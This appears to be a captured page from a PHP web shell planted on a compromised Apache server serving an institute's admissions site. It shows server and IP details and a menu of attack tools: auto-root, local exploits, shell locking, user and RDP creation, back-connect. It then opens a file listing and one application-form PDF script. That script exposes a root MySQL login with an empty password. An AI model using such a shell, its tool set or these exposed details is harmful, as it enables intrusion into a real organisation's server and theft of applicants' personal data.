Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.227.105.164
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
misc /
public_html /
nium /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
applicationForm.php
19.66
KB
-rwxr-xr-x
applicationFormReportSBM.php
21.55
KB
-rwxr-xr-x
candidate_report.php
5.99
KB
-rwxr-xr-x
cappcontext.php
2.87
KB
-rwxr-xr-x
coutput.php
1.75
KB
-rwxr-xr-x
crequestbroker.php
2.49
KB
-rwxr-xr-x
csessions.php
514
B
-rwxr-xr-x
cuser.php
3.41
KB
-rwxr-xr-x
custom_mregistry.php
122
B
-rwxr-xr-x
getnumword.php
7.15
KB
-rwxr-xr-x
json.php
33.22
KB
-rwxr-xr-x
login.php
2.12
KB
-rwxr-xr-x
main.php
9
KB
-rwxr-xr-x
mregistry.php
2.91
KB
-rwxr-xr-x
mregistry_15092014.php
2.38
KB
-rwxr-xr-x
registration.php
41.83
KB
-rwxr-xr-x
registration09082016.php
31.84
KB
-rwxr-xr-x
registration1.php
21.71
KB
-rwxr-xr-x
registration_27082015.php
31.68
KB
-rwxr-xr-x
registration_before_hallticket...
23.29
KB
-rwxr-xr-x
registration_closed_after_last...
32.47
KB
-rwxr-xr-x
registration_old.php
22.54
KB
-rwxr-xr-x
report_hall_ticket.php
11.15
KB
-rwxr-xr-x
reports.php
5.29
KB
-rwxr-xr-x
sample.php
9.27
KB
-rwxr-xr-x
sample_pdf.pdf
13.52
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sample.php
<?php require('../tarka_pdf/fpdf.php'); $SETTINGS["hostname"]='localhost'; $SETTINGS["mysql_user"]='root'; $SETTINGS["mysql_pass"]=''; if (!isset($install) or $install != '1') { $connection = mysql_connect('localhost', 'root', '') or die ('Unable to connect to MySQL server.<br ><br >Please make sure your MySQL login details are correct.'); } mysql_select_db("pget_unani",$connection) or die(mysql_error()); $sql="select * from student where fappno ='1019'"; $result= mysql_query($sql,$connection); $name=''; while($row = mysql_fetch_array($result)) { $fname=$row['fname']; $fdob=$row['fdob']; $fgender=$row['fgender']; $fcatcode=$row['fcatcode']; $fnational=$row['fnational']; $fph=$row['fph']; $fgoi=$row['fgoi']; $fgis=$row['fgoi']; $fdomicile=$row['fdomicile']; $fmotname=$row['fmotname']; $ffatname=$row['ffatname']; $faddr1=$row['faddr1']; $faddr2=$row['faddr2']; $faddr3=$row['faddr3']; $faddr4=$row['faddr4']; $faddp1=$row['faddp1']; $faddp2=$row['faddp2']; $faddp3=$row['faddp3']; $faddp4=$row['faddp4']; $fphone=$row['fphone']; $fmobile=$row['fmobile']; $femail=$row['femail']; $fcollege=$row['fcollege']; $funiversity=$row['funiversity']; $fdoi=$row['fdoi']; $fpercent=$row['fpercent']; $fmaxmarks1=$row['fmaxmarks1']; $fsecmarks1=$row['fsecmarks1']; $fnoatt1=$row['fnoatt1']; $fpassmth1=$row['fpassmth1']; $fmaxmarks2=$row['fmaxmarks2']; $fsecmarks2=$row['fsecmarks2']; $fnoatt2=$row['fnoatt2']; $fpassmth2=$row['fpassmth2']; $fmaxmarks3=$row['fmaxmarks3']; $fsecmarks3=$row['fsecmarks3']; $fnoatt3=$row['fnoatt3']; $fpassmth3=$row['fpassmth3']; $fmaxmarks4=$row['fmaxmarks4']; $fsecmarks4=$row['fsecmarks4']; $fnoatt4=$row['fnoatt4']; $fpassmth4=$row['fpassmth4']; $fmaxmarks5=$row['fmaxmarks5']; $fsecmarks5=$row['fsecmarks5']; $fnoatt5=$row['fnoatt5']; $fpassmth5=$row['fpassmth5']; $fchallanno=$row['fchallanno']; $fchallandate=$row['fchallandate']; $fchallanamount=$row['fchallanamount']; $fbank=$row['fbank']; $fbranch=$row['fbranch']; $flogdate=$row['flogdate']; $flogip=$row['flogip']; } class PDF extends FPDF { //Page header function Header() { //Logo $this->Image('../images/nium.jpg',10,7,23); //Arial bold 15 $this->SetFont('Arial','B',15); //Move to the right $this->Cell(80); //Title $this->Cell(30,10,'National Institute of Unani Medicine,Bangalore',0,0,'C'); //Line break $this->Ln(8); $this->Cell(90); $this->SetFont('Arial','',12); $this->Cell(10,10,'Application Form For Admission To MD / MS (UNANI) Course (2014 - 15)',0,0,'C'); $this->Ln(10); } //Page footer function Footer() { //Position at 1.5 cm from bottom $this->SetY(-15); //Arial italic 8 $this->SetFont('Arial','I',8); //Page number $this->Cell(0,10,'Page '.$this->PageNo().'/{nb}',0,0,'C'); } } $pdf=new PDF(); $pdf->AliasNbPages(); $pdf->AddPage(); $pdf->SetFont('Arial','B',13); $pdf->Cell(60); $pdf->Cell(10,10,'Application No :',0,0,'L'); $pdf->Cell(26); $pdf->SetFont('Arial','',12); $pdf->Cell(40,10,'15551',0,0,'L'); $pdf->Cell(5); $pdf->SetFont('Arial','B',10); $pdf->Cell(29,10,'Registration No :',0,0,'L'); $pdf->SetFont('Arial','',11); $pdf->Cell(0,10,'1456247',0,0,'L'); $pdf->Ln(10); $pdf->SetFont('Arial','B',10); $pdf->Cell(29,10,'Registration No :',0,0,'L'); $fdob=date_create("1234-03-03 00:00:00"); $fdob=date_format($fdob,"d/m/yy "); $pdf->SetFont('Arial','',11); $pdf->Cell(0,10,$fdob,0,0,'L'); $pdf->Output(); /* $pdf->SetFont('Arial','B',14); $pdf->Cell(35,10,'Personal Details',0,0,'C'); $pdf->Ln(10); /*fsubcode, fappno, fregno, fname, fdob, fgender, fcatcode, fnational, fph, fgoi, fgis, fdomicile, fmotname, ffatname, faddr1, faddr2, faddr3, faddr4, faddp1, faddp2, faddp3, faddp4, fphone, fmobile, femail, fcollege, funiversity, fdoi, fpercent, fmaxmarks1, fsecmarks1, fnoatt1, fpassmth1, fmaxmarks2, fsecmarks2, fnoatt2, fpassmth2, fmaxmarks3, fsecmarks3, fnoatt3, fpassmth3, fmaxmarks4, fsecmarks4, fnoatt4, fpassmth4, fmaxmarks5, fsecmarks5, fnoatt5, fpassmth5, fchallanno, fchallandate, fchallanamount, fbank, fbranch, flogdate, flogip */ /* $faddrs_corrp = $faddr1." ".$faddr2." ".$faddr3." ".$faddr4; $faddrs_per = $faddp1." ".$faddp2." ".$faddp3." ".$faddp4; $formDate=array($fname,$fdob,$fgender,$fcatcode,$fnational,$fph,$fgoi,$fgis,$fdomicile,$fmotname,$ffatname,$faddrs_corrp,$faddrs_per,$fmobile,$fphone,$femail); $w=array(11,11,11,11,11,11,11,11,11,11,11,30,30,11,11,11); $formFields=array('Name','Date of Birth','Gender','Category','Nationality','Whether Physically Disabled','Whether GOI Nominee','Whether Govt.In-Service Candidate','Domicile State','Mothers Name','Fathers Name','Permanent Address for Correspondence','Permanent Address','Mobile No','Phone No','Email ID'); $pdf->SetFont('Arial','',11); for($i=0;$i<count($formFields);$i++){ $pdf->Cell(20,$w[$i],$formFields[$i],0,0,'L'); $pdf->Cell(60); $pdf->Cell(200,$w[$i],$formDate[$i],0,0,'L'); $pdf->Ln(); } $pdf->Ln(30); $pdf->SetFont('Arial','B',12); $pdf->Cell(65,10,'Details Of Qualifying Examination',0,0,'C'); $pdf->Ln(9); $formFields2=array('College','University','Date of completion of Internship','Percentage'); $w=array(9,9,9,9); $formData2=array($fcollege,$funiversity,$fdoi,$fpercent); $pdf->SetFont('Arial','',11); for($j=0;$j<count($formFields2);$j++){ $pdf->Cell(20,$w[$j],$formFields2[$j],0,0,'L'); $pdf->Cell(60); $pdf->Cell(200,$w[$j],$formData2[$j],0,0,'L'); $pdf->Ln(); } $pdf->Ln(2); $header=array('Examination' ,'Maximum Marks' ,'Secured Marks' ,'No of Attempts','Passed Month'); $pdf->SetFillColor(255); //$pdf->SetTextColor(255); //$pdf->SetDrawColor(128,0,0); $pdf->SetLineWidth(.4); $pdf->SetFont('','B',10); $w=array(35,35,35,35,40); for($i=0;$i<count($header);$i++) $pdf->Cell($w[$i],10,$header[$i],1,0,'C',true); $pdf->Ln(); $pdf->SetFillColor(224,235,255); $pdf->SetTextColor(0); $pdf->SetFont('','B',10); $fill=false; //foreach($lobj_rs as $key=>$row) //{ $fexams=array("I","II","III","IV","V"); $fmaxmarks=array($fmaxmarks1,$fmaxmarks2,$fmaxmarks3,$fmaxmarks4,$fmaxmarks5); $fsecmarks=array($fsecmarks1,$fsecmarks2,$fsecmarks3,$fsecmarks4,$fsecmarks5); $fnoatts=array($fnoatt1,$fnoatt2,$fnoatt3,$fnoatt4,$fnoatt5); $fpassmths=array($fpassmth1,$fpassmth2,$fpassmth3,$fpassmth4,$fpassmth5); for($k=0;$k<5;$k++) { $pdf->Cell($w[0],8, $fexams[$k],'LR',0,'C',$fill); $pdf->Cell($w[1],8,$fmaxmarks[$k],'LR',0,'C',$fill); $pdf->Cell($w[2],8,$fsecmarks[$k],'LR',0,'C',$fill); $pdf->Cell($w[3],8,$fnoatts[$k],'LR',0,'C',$fill); $pdf->Cell($w[4],8,$fpassmths[$k],'LR',0,'C',$fill); $pdf->Ln(); //$fill=!$fill; } //} $pdf->Cell(array_sum($w),0,'','T'); $pdf->Ln(5); $pdf->SetFont('Arial','B',12); $pdf->Cell(28,10,'Details Of Fee',0,0,'C'); $pdf->Ln(9); $formFields3=array('Challan No','Date','Amount','Name of the Bank','Branch Name with Place'); $formData3=array($fchallanno,$fchallandate,$fchallanamount,$fbank,$fbranch); $w=array(9,9,9,9,9); $pdf->SetFont('Arial','',11); for($j=0;$j<count($formFields3);$j++) { $pdf->Cell(20,$w[$j],$formFields3[$j],0,0,'L'); $pdf->Cell(60); $pdf->Cell(200,$w[$j],$formData3[$j],0,0,'L'); $pdf->Ln(); } $pdf->Ln(5); $pdf->SetFont('Arial','B',12); $pdf->Cell(55,10,'Declaration By The Applicant',0,0,'L'); $pdf->Ln(10); $declarationTemp="I ______________________ ,Son / Daughter of _______________________ declare that all the statements given in this application form are true to the best of my knowledge. I understand that if any of the statements are found wrong.my admission stands cancelled. If admitted, I will abide by the rules and regulations in force in NIUM and as amended from time to time and pay the prescribed fees."; $pdf->SetFont('Arial','',9); $pdf->MultiCell(0,5,$declarationTemp,0,'L'); $pdf->Ln(5); $pdf->SetFont('Arial','',11); $pdf->Cell(10,10,'Date :',0,0,'L'); $pdf->Cell(2); $pdf->Cell(115,10,'-------------------------',0,0,'L'); $pdf->Cell(0,10,'---------------------------------------',0,0,'L'); $pdf->Ln(10); $pdf->SetFont('Arial','',10); $pdf->Cell(10,10,'Place :',0,0,'L'); $pdf->Cell(2); $pdf->Cell(120,10,'-------------------------',0,0,'L'); $pdf->Cell(0,10,'Signature of the Candidate',0,0,'L'); $pdf->Ln(10); $pdf->SetFont('Arial','',11); $pdf->Cell(10,10,'For Office Use : Date of receiving of application .................................... Fee Paid Rs ..........................',0,0,'L'); $pdf->Ln(20); $pdf->Cell(85); $pdf->Cell(10,10,'Signature of receiving Clerk .....................................',0,0,'L'); //$file_path="application_form.pdf"; $file ="sample_pdf.pdf"; $pdf->Output(); /* header('Content-type: application/pdf'); header('Content-Disposition: inline; filename="' . $filename . '"'); header('Content-Transfer-Encoding: binary'); header('Content-Length: ' . filesize($file)); header('Accept-Ranges: bytes'); @readfile($file); exit(); */ /* header('Content-Description: File Transfer'); header('Content-Type: application/pdf'); header('Content-Disposition: attachment; filename='.basename($file)); header('Content-Transfer-Encoding: binary'); header('Expires: 0'); header('Cache-Control: must-revalidate, post-check=0, pre-check=0'); header('Pragma: public'); header('Content-Length: ' . filesize($file)); ob_clean(); flush(); readfile($file); exit; */ ?>
Close